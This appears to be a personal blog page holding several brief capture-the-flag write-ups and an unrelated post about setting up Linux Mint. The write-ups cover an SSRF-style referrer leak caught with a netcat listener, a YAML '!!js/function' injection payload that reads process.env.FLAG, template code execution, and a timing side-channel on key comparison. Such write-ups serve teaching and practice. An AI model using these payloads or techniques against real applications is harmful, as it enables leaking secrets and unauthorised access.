Mehran's Boring Blog

daily so-called-technical experiences

Mehran's Boring Blog

daily so-called-technical experiences

I found myself publishing things, which may or may not be taken seriously.

Subject Categories

Latest Comments

Recent Posts

Of course the web server has to "fetch" the image file to rate it. Let's see the request, just fire up a netcat -lkv 54321 and submit the image link http://YOURIP:54321/. You should get something like:
listening on [any] 54321 ...
connect to [YOURIP] from [] 46845
GET / HTTP/1.1
Host: YOURIP:54321
Accept: */*
X-Referrer: 92702a9381515494689f5d14f85a83b7.php

OK, there's some interesting Referrer waiting for us. What if we tried to go the url? Ooops, that's a super secret page, containing the message By the way, the flag is f556b9a48a3ee914f291f9b98645cb02 commented in HTML.
۴ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:46
Here's the app's code.

Pretty much like the web100-2 task, we should inject js code into the template, such that it has access to js global context.
That's not hard, just RTFM, and you'll see how load is considered unsafe, and should NOT be used to load untrusted data sources. Let's exploit it:

flag: !!js/function >
  function flag() {
    return process.env.FLAG;
{{ flag }}

and take your flag away.
۰ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:37
Here's the app's code.
So, the underscore template is provided by the user. It's easy to execute arbitrary js code in the same context normal js code is run.

That's all.
۰ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:29

So, here's the PHP file in charge of authentication: See how line 12 is a conditional time-consuming statement. That may be (ab)used to launch a side channel attack: The amount of time a request takes to get processed is relative to the length of matched key prefix.
We may iterate over different characters until we observe significant (~200ms) increase in response time. That means we have that prefix matched, and we may continue to the remaining part.
Let's exploit it then:
Notes in the code:

  • You MUST use keep-alive to reuse the TCP connection for different requests, so that the network latency effect (which may be pretty random in case of TCP handshakes) is minimized
  • I've sent multiple requests to avoid random network glitches resulting in outcome-fuckery
۰ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:01

Linux is about choice, but I'd rather be provided with reasonable defaults so that the needed customization is minimal.
Having heard about Linux Mint before, I decided to give it a try.

TL;DR: Mint has a good De-facto installation. Many applications which don't come with other distros (mostly because of patent and licensing issues), are already installed out of the box. But, beside not needing an install-fest, I didn't find anything special in Mint. Cinnamon was slick, the community seemed to be passionate and active, but nothing extra ordinary.

What I did NOT install in Linux Mint (which Ubuntu used to need):

  1. Codec: So you used to installed VLC and Mplayer and all those codecs? You won't need to do it anymore.
  2. JRE: Java Runtime Environment needed for running any Java application. A must-have.
  3. Pidgin: I used to do apt-get purge empathy; apt-get install pidgin, this time I didn't.
  4. Flash Plugin: Many scruffy-smelly-bad-guys on the web are flash-aholics.
  5. Nautilus Extensions: Believe it or not, I couldn't live without nautilus's "Open In Terminal" and "Open as root". They are installed out of the box, on Mint. Kudas!
  6. Synaptic Package Manger: You know what? I used to think that Canonical guys were idiots because of removing Synaptic from the default installation, and I still do.
  7. /etc/apt/apt.conf.d/20archive: Haha. Who needs periodical cache cleanup? Mint has it disabled by default.

What follows is a list of configurations and customizations I did after a fresh installation. This is NOT intended to be anyhow general. Actually, it's more of a personal TODO-list-after-you-install-Mint, but I thought one might find something useful amongst these.

۰ comment Uppers ۰ Downers ۰ 26 August 12 ، 18:26